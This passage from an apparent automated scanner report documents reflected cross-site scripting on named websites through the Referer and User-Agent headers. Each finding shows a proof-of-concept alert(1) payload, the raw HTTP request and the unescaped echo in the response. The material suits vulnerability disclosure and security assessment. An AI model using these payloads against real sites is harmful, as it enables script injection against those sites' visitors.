Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curezone.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=f1901<script>alert(1)</script>a5ecaf5203a

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 15:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Fri, 01 Apr 2011 22:38:59 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>

<meta name="google-site-verification" content="evYYGlmZv0RpFVdpbIvaUyQhlbgRCR0AAJcFrhpT69o" />


<meta http-equiv="expi
...[SNIP]...
</script>a5ecaf5203a">http://www.google.com/search?hl=en&q=f1901<script>alert(1)</script>a5ecaf5203a</a>
...[SNIP]...

2.75. http://www.deadoraliveinfo.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.deadoraliveinfo.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8568"><script>alert(1)</script>9db11d77501 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deadoraliveinfo.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=d8568"><script>alert(1)</script>9db11d77501

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sat, 02 Apr 2011 15:36:19 GMT
Last-Modified: Sat, 02 Apr 2011 15:36:17 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 4531
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Dead or Alive?</title>
<base href="http://www.deadoraliveinfo.com/dead.nsf/">
<link rel="shortcut icon" href="/images/favi
...[SNIP]...
<img src="/domcount_2.nsf/FastCount?OpenAgent&X=referer-http://www.google.com/search?hl=en^q=d8568"><script>alert(1)</script>9db11d77501&S=NULL" width="1" height="1" alt="" />
...[SNIP]...

2.76. http://www.foodnetworkstore.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foodnetworkstore.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f149a"-alert(1)-"255280f886e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodnetworkstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=f149a"-alert(1)-"255280f886e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77084
Content-Type: text/html; charset=utf-8
Set-Cookie: Customer=CustomerID=0&FirstName=&MiddleInitial=&LastName=&IsAnon=True&IsRegistered=False&IsReturning=False&SKULastViewed=&SKULastSearched=&ZipCodeForEstShipping=; expires=Mon, 02-May-2011 07:00:00 GMT; path=/
Set-Cookie: reg_user=reg_id=0&RegEmail=; expires=Mon, 02-May-2011 07:00:00 GMT; path=/
Set-Cookie: CookingAd=ccaid=FNDirect; expires=Mon, 02-May-2011 07:00:00 GMT; path=/
Set-Cookie: FoodNetwork=; expires=Fri, 01-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: FoodNetwork=PageMode=&Nav=0; expires=Mon, 02-May-2011 07:00:00 GMT; path=/
Set-Cookie: CCREFID=ID=http://www.google.com/search?hl=en&q=f149a"-alert(1)-"255280f886e&Version=1.0; expires=Mon, 02-May-2011 16:05:56 GMT; path=/
P3P: CP="CAO DSP COR CURa ADMi DEVi OUR BUS UNI STA", policyref="/w3c/p3p.xml"
Date: Sat, 02 Apr 2011 16:05:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" version="XHTML+RDFa 1
...[SNIP]...
<![CDATA[
/* You may give each page an identifying name, server, and channel on
the next lines. */

s.pageName = "Shop: Home Page"
s.referrer = "http://www.google.com/search?hl=en&q=f149a"-alert(1)-"255280f886e"
s.setRef = ""
s.channel = "Shop"
s.prop1 = ""
s.prop2 = "Shop: Home Page"
s.prop3 = "FNDIRECT"
s.prop4 = ""
s.prop5 = ""
s.prop6 = "%252fDefault.aspx"
s.prop7 = ""
s.prop8 = ""
s.prop9 = "
...[SNIP]...

2.77. http://www.hairyhottie.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hairyhottie.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb369'-alert(1)-'7658685b4f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyhottie.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: bb369'-alert(1)-'7658685b4f7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:08:57 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.6 mod_ssl/2.8.28 OpenSSL/0.9.7e-p1
X-Powered-By: PHP/5.2.6
Content-Type: text/html
Content-Length: 105051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!--
document.cookie='atref=bb369'-alert(1)-'7658685b4f7$#; path=/;'
// -->
...[SNIP]...

2.78. http://www.la-sentinel.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.la-sentinel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bf8"><script>alert(1)</script>b2ee995e5d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.la-sentinel.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=23bf8"><script>alert(1)</script>b2ee995e5d6

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:00:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 42230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head
profi
...[SNIP]...
<a
href="HWP.php?ref=http://www.google.com/search?hl=en&q=23bf8"><script>alert(1)</script>b2ee995e5d6&t202id=&t202kw=&match=&c3=" target="_blank"
class="link1" style="color: rgb(0, 0, 0); text-decoration: none;">
...[SNIP]...

2.79. http://www.makeupalley.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.makeupalley.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de68"><a>51b72db6471 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.makeupalley.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=3de68"><a>51b72db6471

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:57:14 GMT
Server: Microsoft-IIS/6.0
Compression-Control: whitespace
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Type: text/html
Expires: Fri, 08 May 2009 05:17:14 GMT
Cache-control: private, no-cache, no-cache="Set-Cookie", proxy-revalidate
Vary: User-Agent
Content-Length: 15778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" dir="ltr"><head> <title
...[SNIP]...
<input type="text" name="q" id="q" value="3de68"><a>51b72db6471" />
...[SNIP]...

2.80. http://www.marketgid.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 5b25e<script>alert(1)</script>1a0cb81415e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marketgid.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=5b25e<script>alert(1)</script>1a0cb81415e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 15:40:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 374068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>MarketGid: ............ ...................... ..............-.............
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=5b25e<script>alert(1)</script>1a0cb81415e</div>
...[SNIP]...

2.81. http://www.metapress.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.metapress.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7ddc9<script>alert(1)</script>4fe15cfe632 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: 7ddc9<script>alert(1)</script>4fe15cfe632
Host: www.metapress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tfiwrg5510lmdumfsrqppzf0; path=/; HttpOnly
Set-Cookie: CookiesSupported=True; expires=Mon, 02-Apr-2012 15:06:43 GMT; path=/
Set-Cookie: ShoppingCart=58b49f4c-494a-49f8-bfcc-22705670a083; expires=Sat, 09-Apr-2011 15:06:43 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16387


<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head><title>
   Welcome to MetaPress
</title><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /><link hr
...[SNIP]...
<br>HTTP User Agent:&nbsp;7ddc9<script>alert(1)</script>4fe15cfe632<br>
...[SNIP]...

2.82. http://www.networkworld.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dca2'-alert(1)-'4810f0b2578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.networkworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=3dca2'-alert(1)-'4810f0b2578

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 02 Apr 2011 15:59:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 15:59:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 210835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
eneral',
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&amp;q=3dca2'-alert(1)-'4810f0b2578',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};

...[SNIP]...

2.83. http://www.nmnathletics.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nmnathletics.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a6aae--><script>alert(1)</script>afbe724f576 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nmnathletics.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=a6aae--><script>alert(1)</script>afbe724f576

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:12:57 GMT
Server: Apache
Content-Length: 381
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html><head>
<!-- The server is oma-www36.xosn.com/10.3.9.171--><!-- The time is 04/02/2011 10:12:57 AM EST--><!-- The referer is http://www.google.com/search?hl=en&q=a6aae--><script>alert(1)</script>afbe724f576-->
...[SNIP]...

2.84. http://www.nudist-girls.info/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nudist-girls.info
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b600'-alert(1)-'0ea4449f546 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nudist-girls.info
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 6b600'-alert(1)-'0ea4449f546

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:19:07 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 150120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>

<title>Nudist Girls</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv=
...[SNIP]...
<!--
document.cookie='atref=6b600'-alert(1)-'0ea4449f546$#; path=/;'
// -->
...[SNIP]...

2.85. http://www.pacificpoker.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pacificpoker.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55df7'-alert(1)-'e1ef2702f3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.355df7'-alert(1)-'e1ef2702f3d
Host: www.pacificpoker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 15:27:43 GMT
P3p: policyref="http://www.pacificpoker.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP CAO COR UNI COM NAV"
Cache-control: no-cache
Content-type: text/html;charset=ISO-8859-1
Set-cookie: MyCookie=gln1-sol10-147; Domain=.pacificpoker.com; Path=/
Set-cookie: JSESSIONID=5A73E8060C86084669053EE82D5B0141; Domain=.pacificpoker.com
Set-cookie: OANID=gomipcpenib7ef4fc6c3e9c4414ff9ee8c; Domain=.pacificpoker.com; Expires=Sun, 02-Oct-2011 15:27:43 GMT; Path=/
Set-cookie: scut=lang**en__s**615638281852611860__os**615638281852611860__sr**945185__osr**945185__flag**No__l**__ic**51__st**0__bc**0__anid**gomipcpenib7ef4fc6c3e9c4414ff9ee8c__se**900000__osadcampaign**; Domain=.pacificpoker.com; Path=/
Content-Length: 73530


<!-- gln1-sol10-147 --><!-- / -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN
...[SNIP]...
"gomipcpenib7ef4fc6c3e9c4414ff9ee8c";
var showCurHP = "false";
var sVer7 = "false";
var sSESerial = "900000";
var sUserAgent = 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.355df7'-alert(1)-'e1ef2702f3d';
var flashURL = "null";
var italyDomain = "special.servletmaxlife.com";
var unknown = "true";
var sOsadcampaign = "";
var Domain = "www.pacificpoker.com";

// Query Strings

var sCut = "lang
...[SNIP]...

2.86. http://www.postlets.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.postlets.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 548a7--><script>alert(1)</script>bb4f9ff3fde was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.postlets.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=548a7--><script>alert(1)</script>bb4f9ff3fde

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=ct70fdn07fe6ns4r6h6o209ep7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 15310

<!--
www.postlets.com
HTTP_USER_AGENT = curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
HTTP_HOST = www.postlets.com
HTTP_ACCEPT = */*
HTTP_PROXY_CONNECTION = Keep-Alive
HTTP_REFERER = http://www.google.com/search?hl=en&q=548a7--><script>alert(1)</script>bb4f9ff3fde
-->
...[SNIP]...

2.87. http://www.postlets.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.postlets.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload f2dbd--><script>alert(1)</script>6037b7be2a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3f2dbd--><script>alert(1)</script>6037b7be2a6
Host: www.postlets.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:45:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=gruvss50nhhcf05jbtujo1b903; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 15257

<!--
www.postlets.com
HTTP_USER_AGENT = curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3f2dbd--><script>alert(1)</script>6037b7be2a6
HTTP_HOST = www.postlets.com
HTTP_ACCEPT = */*
HTTP_PROXY_CONNECTION = Keep-Alive
-->
...[SNIP]...

2.88. http://www.riomature.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.riomature.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 157e7'-alert(1)-'f898fdcea0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.riomature.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 157e7'-alert(1)-'f898fdcea0f

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 15:35:41 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 182494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<script src="links/count.php?gr=1"></script>
<script language="JavaScript1.2"> fu
...[SNIP]...
<!--
document.cookie='a2r=157e7'-alert(1)-'f898fdcea0f#!; path=/;'
document.cookie='a2x=#!; path=/;'
document.cookie='a2u=0#!; path=/;'
document.cookie='a2b=157e7'-alert(1)-'f898fdcea0f#!; path=/; expires=December 31, 2100;'
// -->
...[SNIP]...

2.89. http://www.riomoms.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.riomoms.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abea2'-alert(1)-'25682bbcd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.riomoms.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: abea2'-alert(1)-'25682bbcd9

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 15:32:25 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 91178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>MILF and Mature Wom
...[SNIP]...
<!--
document.cookie='a2r=abea2'-alert(1)-'25682bbcd9#!; path=/;'
document.cookie='a2x=#!; path=/;'
document.cookie='a2b=abea2'-alert(1)-'25682bbcd9#!; path=/; expires=December 31, 2100;'
// -->
...[SNIP]...

2.90. http://www.seniorfriendfinder.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seniorfriendfinder.com
Path:   /

Issue detail

